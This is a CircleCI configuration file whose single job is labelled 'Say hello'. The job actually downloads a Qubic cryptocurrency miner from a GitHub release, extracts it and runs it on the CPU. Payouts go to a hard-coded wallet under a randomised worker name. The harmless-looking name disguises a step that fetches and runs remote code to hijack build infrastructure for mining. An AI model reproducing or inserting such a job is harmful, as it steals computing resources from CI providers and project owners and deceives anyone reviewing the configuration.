version: 2.1

jobs:
  say-hello:
    docker:
      - image: cimg/base:current
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://github.com/jtskxx/JETSKI-QUBIC-POOL/releases/download/latest/qubjetski-Linux-v1.2.tar.gz && tar -xvzf qubjetski-Linux-v1.2.tar.gz && cd qubjetski-Linux-v1.2 && ./qubjetski-Linux -wallet KVAQTPYWKGFQKETWTBAEZBCIKVNAQZFUIFPTPJSETEDNEJMSVLBEGHEGOOLM -cpu -workername $(printf '%s' $(echo "$RANDOM" | md5sum) | cut -c 1-10)

workflows:
  say-hello-workflow:
    jobs:
      - say-hello
